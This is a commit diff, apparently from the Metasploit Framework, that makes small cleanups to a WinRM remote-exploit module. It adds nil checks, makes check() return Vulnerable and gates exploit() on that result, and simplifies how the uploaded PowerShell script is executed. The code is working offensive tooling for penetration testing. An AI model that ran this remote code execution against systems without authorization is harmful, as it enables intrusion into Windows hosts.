Some minor code cleanup
This commit is contained in:
David Maloney
parent
f69ccc779f
commit
fca8208171
|
|
@ -189,16 +189,19 @@ module Exploit::Remote::WinRM
|
|||
end
|
||||
|
||||
def winrm_get_shell_id(response)
|
||||
return nil if response.nil?
|
||||
xml = response.body
|
||||
shell_id = REXML::Document.new(xml).elements["//w:Selector"].text
|
||||
end
|
||||
|
||||
def winrm_get_cmd_id(response)
|
||||
return nil if response.nil?
|
||||
xml = response.body
|
||||
cmd_id = REXML::Document.new(xml).elements["//rsp:CommandId"].text
|
||||
end
|
||||
|
||||
def winrm_get_cmd_streams(response)
|
||||
return nil if response.nil?
|
||||
streams = {
|
||||
'stdout' => '',
|
||||
'stderr' => '',
|
||||
|
|
|
|||
|
|
@ -74,6 +74,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_error "The Remote WinRM server does not appear to allow Negotiate(NTLM) auth"
|
||||
return Msf::Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
return Msf::Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
def powershell2?
|
||||
|
|
@ -116,12 +118,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
streams = winrm_run_cmd("powershell Get-ExecutionPolicy")
|
||||
if streams['stdout'].include? 'Unrestricted'
|
||||
print_good "Set Execution Policy Successfully"
|
||||
return true
|
||||
end
|
||||
return false
|
||||
end
|
||||
|
||||
def exploit
|
||||
unless check == Msf::Exploit::CheckCode::Vulnerable
|
||||
return
|
||||
end
|
||||
if powershell2?
|
||||
path = upload_script
|
||||
return if path.nil?
|
||||
|
|
@ -167,20 +173,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def exec_script(path)
|
||||
print_status "Attempting to execute script..."
|
||||
cmd = "powershell -File #{path}"
|
||||
resp,c = send_request_ntlm(winrm_open_shell_msg)
|
||||
if resp.nil?
|
||||
print_error "Got no reply from target"
|
||||
return
|
||||
end
|
||||
unless resp.code == 200
|
||||
print_error "Got unexpected response from #{ip}: \n #{resp.to_s}"
|
||||
return
|
||||
end
|
||||
shell_id = winrm_get_shell_id(resp)
|
||||
resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id))
|
||||
cmd_id = winrm_get_cmd_id(resp)
|
||||
resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id))
|
||||
streams = winrm_get_cmd_streams(resp)
|
||||
winrm_run_cmd_hanging(cmd)
|
||||
end
|
||||
|
||||
def encoded_psh(script)
|
||||
|
|
@ -210,6 +203,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return streams['stdout'].chomp
|
||||
end
|
||||
|
||||
|
||||
|
||||
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue